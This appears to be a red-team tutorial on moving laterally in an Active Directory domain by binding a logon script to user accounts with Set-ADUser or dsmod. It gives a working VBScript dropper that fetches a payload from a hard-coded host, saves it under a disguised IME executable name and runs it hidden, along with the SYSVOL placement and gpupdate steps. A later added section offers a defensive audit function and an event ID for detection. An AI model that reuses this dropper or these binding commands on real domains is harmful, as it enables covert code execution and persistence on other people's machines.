0x1. Usage scenario

After obtaining domain controller access, domain admin, or other high privileges, you may want to move laterally to a PC host in the domain. If the target has its firewall enabled, lateral movement over ports 445 and 135 is not possible. In that case, you can gain access to the target host by binding a logon script to the user.

0x2. Usage method

Method 1: PowerShell (built in on Windows Server 2012 and above). Get the current domain user information:

Get-ADUser -Filter * -Properties * | sort LastLogonDate | select name,mail,DistinguishedName,LastLogonDate | Export-Csv -Path C:\Users\Public\Documents\user.csv -Encoding utf8

Bind the script to the specified user

Set-ADUser -Identity zhangsan -ScriptPath 'download.vbs'

Unbind

Set-ADUser -Identity zhangsan -ScriptPath ' '

Method 2: Use dsmod for binding

dsmod user -loscr 'download.vbs' 'CN=john,CN=Users,DC=redteam,DC=com'

Unbind

dsmod user -loscr '' 'CN=john,CN=Users,DC=redteam,DC=com'

Refresh group policy

shell gpupdate /force

VBS content

strFileURL = "http://192.168.172.129:82/logo.ico"
strHDLocation = "C:\Users\Public\Documents\ChsIME.exe"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, False
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
    Set objADOStream = CreateObject("ADODB.Stream")
    objADOStream.Open
    objADOStream.Type = 1 'adTypeBinary
    objADOStream.Write objXMLHTTP.ResponseBody
    objADOStream.Position = 0 'Set the stream position to the start
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    If objFSO.FileExists(strHDLocation) Then objFSO.DeleteFile strHDLocation
    Set objFSO = Nothing
    objADOStream.SaveToFile strHDLocation
    objADOStream.Close
    Set objADOStream = Nothing
End If
Set objXMLHTTP = Nothing
strComputer = "."
Set ws = WScript.CreateObject("WScript.Shell")
val = ws.Run("C:\Users\Public\Documents\ChsIME.exe", 0)

Upload the script to the directory c:\windows\SYSVOL\sysvol\redteam.com\SCRIPTS\ on the DC, bind it using method 1 or method 2, and refresh group policy.

https://www.cnblogs.com/websecyw/p/16657762.html
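
Because both methods work by writing the user's scriptPath attribute, auditing that attribute shows which accounts have a logon script bound. The following is an added example, not part of the original post; the function name, the approved script name logon.bat and the sample accounts are constructed, and treating a whitespace-only value as a leftover of the unbind command above is an assumption.

```powershell
# Added audit example (not from the original post).
# Flags accounts whose scriptPath is set to something outside an approved list.
function Find-SuspectLogonScript {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)] $User,
        [string[]] $ApprovedScripts = @(),   # hypothetical allowlist of known logon scripts
        [int] $RecentDays = 7
    )
    begin { $cutoff = (Get-Date).AddDays(-$RecentDays) }
    process {
        $path = [string]$User.ScriptPath
        if ($path.Length -eq 0) { return }   # attribute not set: nothing bound

        if ([string]::IsNullOrWhiteSpace($path)) {
            # Assumption: a blank value is what "-ScriptPath ' '" leaves behind
            $reason = 'whitespace-only value (possible earlier bind/unbind)'
        } elseif ($ApprovedScripts -notcontains $path.Trim()) {
            $reason = 'script not on the approved list'
        } else {
            return                           # approved script, nothing to report
        }

        [pscustomobject]@{
            SamAccountName  = $User.SamAccountName
            ScriptPath      = $path
            Reason          = $reason
            # whenChanged covers the whole object, not only scriptPath
            RecentlyChanged = ($User.whenChanged -gt $cutoff)
        }
    }
}

# Constructed sample objects so the function can be tried without a domain
$sample = @(
    [pscustomobject]@{ SamAccountName = 'alice'; ScriptPath = 'logon.bat';    whenChanged = (Get-Date).AddDays(-400) }
    [pscustomobject]@{ SamAccountName = 'bob';   ScriptPath = 'download.vbs'; whenChanged = (Get-Date).AddDays(-1) }
    [pscustomobject]@{ SamAccountName = 'carol'; ScriptPath = ' ';            whenChanged = (Get-Date).AddDays(-2) }
    [pscustomobject]@{ SamAccountName = 'dave';  ScriptPath = $null;          whenChanged = (Get-Date).AddDays(-3) }
)
$sample | Find-SuspectLogonScript -ApprovedScripts 'logon.bat' | Format-Table -AutoSize

# Against a live domain (requires the ActiveDirectory module):
# Get-ADUser -LDAPFilter '(scriptPath=*)' -Properties ScriptPath,whenChanged |
#     Find-SuspectLogonScript -ApprovedScripts 'logon.bat'
```

With the sample data only bob and carol are reported. On domain controllers, event 4738 (a user account was changed) records the Script Path value when account management auditing is enabled, which gives the time of the change and the account that made it.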
